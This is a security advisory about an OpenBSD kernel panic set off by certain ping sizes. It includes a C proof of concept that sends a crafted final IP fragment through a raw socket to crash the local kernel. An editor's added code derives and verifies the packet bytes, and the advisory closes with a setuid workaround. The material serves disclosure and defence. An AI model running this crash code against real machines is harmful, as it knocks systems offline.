COMMAND

    ping

SYSTEMS AFFECTED

    OpenBSD

PROBLEM

    Ficus carica found that running either of the following on his
    OpenBSD-current PPP system:

        ping -s2955 1.2.3.4

    or

        ping -s1455 1.2.3.4

    causes a kernel panic.

    Thankfully this bug does NOT appear to be remotely exploitable: the
    packet has to be  handed to the local  kernel through a raw  socket
    (or by the setuid ping).  There is  second-hand confirmation  that
    the same problem exists under NetBSD.  Note that it seems that for
    the commands above to cause a reboot, the system must NOT  have  a
    default route, which tends to reduce the impact of the bug.

    Note also that the bug does not trigger in a large number of  cases
    and that it is only a crash bug.  Anyway, code follows:

    /* 1-3 bytes of fragment data will cause panic.                 */
    /* ping -pff -s2955 to some interface with an MTU of 1500 bytes */
    /* will recreate this packet, so it's clearly legal.            */
    /* If it doesn't work, mail me for the original program.        */
    /* Ficus carica <fc@parkone.ci.oakland.ca.us>                   */

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    /* A complete 23-byte IP datagram: 20-byte header (total length 0x17,
     * ID 0x027a, flags 0 with fragment offset 0x172 = byte 2960, TTL 255,
     * protocol 1 = ICMP, checksum 0xa7e6, 1.2.3.4 -> 5.6.7.8) and three
     * bytes of payload, i.e. the last fragment of a 2963-byte ICMP echo. */
    char buf[] = "\x45\x00\x00\x17\x02\x7A\x01\x72\xFF\x01\xA7\xE6"
                 "\x01\x02\x03\x04\x05\x06\x07\x08\xFF\xFF\xFF";
    /* will not panic with more than three bytes    ^^  ^^  ^^      */

    int main(void) {
            struct sockaddr_in thesocket;
            int sockd, on = 1;

            memset(&thesocket, 0, sizeof(thesocket));
            thesocket.sin_family = AF_INET;
            thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");

            /* IP_HDRINCL: send buf as-is, header included, instead of
             * letting the kernel prepend its own IP header.  Caveat:
             * 4.4BSD-derived raw IP sockets expect ip_len and ip_off in
             * host byte order here, so a little-endian host reads those
             * two fields byte-swapped.                                 */
            sockd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
            if (sockd < 0) {
                    perror("socket");
                    return 1;
            }
            setsockopt(sockd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
            /* sizeof(buf) - 1: do not send the string's null terminator */
            if (sendto(sockd, buf, sizeof(buf) - 1, 0,
                       (struct sockaddr *)&thesocket, sizeof(thesocket)) < 0)
                    perror("sendto");
            close(sockd);
            return 0;
    }
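    To show why the bytes above are "clearly legal", here is an added
    example (editor's code, not Ficus carica's program and not part of
    the original advisory) that derives the final fragment from the ping
    size and the interface MTU: it splits a 2963-byte echo request (2955
    bytes of -s payload plus the 8-byte ICMP header) into 1480-byte
    pieces, works out the offset of the 3-byte tail (2960 / 8 = 0x172),
    fills in the header checksum and compares the result byte for byte
    with the packet in the advisory.  ID 0x027a, TTL 255, the 0xff fill
    and the 1.2.3.4 -> 5.6.7.8 addresses are taken from that packet; the
    function names are mine.  It also covers the edge cases: an exact
    multiple of 1480 gives a full last fragment, and -s1455 through a
    1500-byte MTU fits in one datagram, so the function returns 0 for it
    (the advisory does not say what MTU that PPP link had).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_HDR_LEN   20   /* IPv4 header without options */
#define ICMP_HDR_LEN 8    /* echo header that ping adds to its -s payload */

/* One's-complement Internet checksum (RFC 1071) over len bytes.
 * Over a header whose checksum field is already filled in it returns 0. */
uint16_t ip_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)data[i] << 8) | data[i + 1];
    if (len & 1)
        sum += (uint32_t)data[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffffu) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Payload bytes per non-final fragment: MTU minus header, rounded down to
 * a multiple of 8, because fragment offsets count in 8-byte units. */
static size_t frag_payload(size_t mtu)
{
    return (mtu - IP_HDR_LEN) & ~(size_t)7;
}

/* Payload bytes in the final fragment of `ping -s size` sent through an
 * interface with the given MTU; 0 when the echo request is not fragmented. */
size_t last_fragment_len(size_t size, size_t mtu)
{
    size_t total = ICMP_HDR_LEN + size;      /* ICMP bytes to split up */
    size_t per, rem;
    if (mtu < IP_HDR_LEN + 8 || total <= mtu - IP_HDR_LEN)
        return 0;                            /* no room, or fits as-is */
    per = frag_payload(mtu);
    rem = total % per;
    return rem ? rem : per;                  /* exact multiple: full tail */
}

/* Build the final fragment as it goes on the wire: IP header with MF clear
 * and the offset of the tail, then the tail bytes filled with 0xff (the
 * pattern `ping -pff` uses). Returns the datagram length, 0 if nothing to do. */
size_t build_last_fragment(uint8_t *out, size_t outlen, size_t size, size_t mtu,
                           uint16_t id, uint8_t ttl, uint32_t src, uint32_t dst)
{
    size_t tail = last_fragment_len(size, mtu);
    size_t total = ICMP_HDR_LEN + size;
    size_t len = IP_HDR_LEN + tail;
    uint16_t off8, cksum;

    if (tail == 0 || outlen < len)
        return 0;
    off8 = (uint16_t)((total - tail) / 8);   /* offset in 8-byte units */
    memset(out, 0, len);
    out[0]  = 0x45;                          /* IPv4, IHL 5 (20 bytes) */
    out[2]  = (uint8_t)(len >> 8);  out[3]  = (uint8_t)len;
    out[4]  = (uint8_t)(id >> 8);   out[5]  = (uint8_t)id;
    out[6]  = (uint8_t)((off8 >> 8) & 0x1f); /* flags 000: DF and MF clear */
    out[7]  = (uint8_t)off8;
    out[8]  = ttl;
    out[9]  = 1;                             /* IPPROTO_ICMP */
    out[12] = (uint8_t)(src >> 24); out[13] = (uint8_t)(src >> 16);
    out[14] = (uint8_t)(src >> 8);  out[15] = (uint8_t)src;
    out[16] = (uint8_t)(dst >> 24); out[17] = (uint8_t)(dst >> 16);
    out[18] = (uint8_t)(dst >> 8);  out[19] = (uint8_t)dst;
    memset(out + IP_HDR_LEN, 0xff, tail);
    cksum = ip_checksum(out, IP_HDR_LEN);    /* bytes 10-11 still zero here */
    out[10] = (uint8_t)(cksum >> 8); out[11] = (uint8_t)cksum;
    return len;
}

/* The 23-byte packet from the advisory, copied here for comparison. */
const uint8_t advisory_packet[23] = {
    0x45,0x00,0x00,0x17,0x02,0x7a,0x01,0x72,0xff,0x01,0xa7,0xe6,
    0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0xff,0xff,0xff
};

/* 1 if ping -s2955 through a 1500-byte MTU reproduces the advisory's bytes. */
int matches_advisory_packet(void)
{
    uint8_t pkt[64];
    size_t n = build_last_fragment(pkt, sizeof pkt, 2955, 1500,
                                   0x027a, 255, 0x01020304u, 0x05060708u);
    return n == sizeof advisory_packet && memcmp(pkt, advisory_packet, n) == 0;
}

int main(void)
{
    uint8_t pkt[64];
    size_t i, n = build_last_fragment(pkt, sizeof pkt, 2955, 1500,
                                      0x027a, 255, 0x01020304u, 0x05060708u);
    printf("last fragment of ping -s2955 over MTU 1500 (%zu bytes):\n", n);
    for (i = 0; i < n; i++)
        printf("%02x%c", pkt[i], i + 1 == n ? '\n' : ' ');
    printf("matches advisory packet: %s\n", matches_advisory_packet() ? "yes" : "no");
    printf("ping -s1455 over MTU 1500: tail of %zu bytes (0 = not fragmented)\n",
           last_fragment_len(1455, 1500));
    return 0;
}
```

    Running ip_checksum() over the advisory's 20-byte header, checksum
    field included, yields 0, which is the usual receive-side check that
    the 0xa7e6 in the packet is right.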

SOLUTION

    Until the kernel is fixed, the workaround reads:

        1: chmod a-s /usr/sbin/traceroute /sbin/ping
        2: avoid goofing around with home-made packet fraggers

    Step 1 only keeps unprivileged users away from raw sockets  (ping
    and traceroute are setuid root because opening a raw socket needs
    root); root can still trigger the panic until the kernel itself is
    fixed.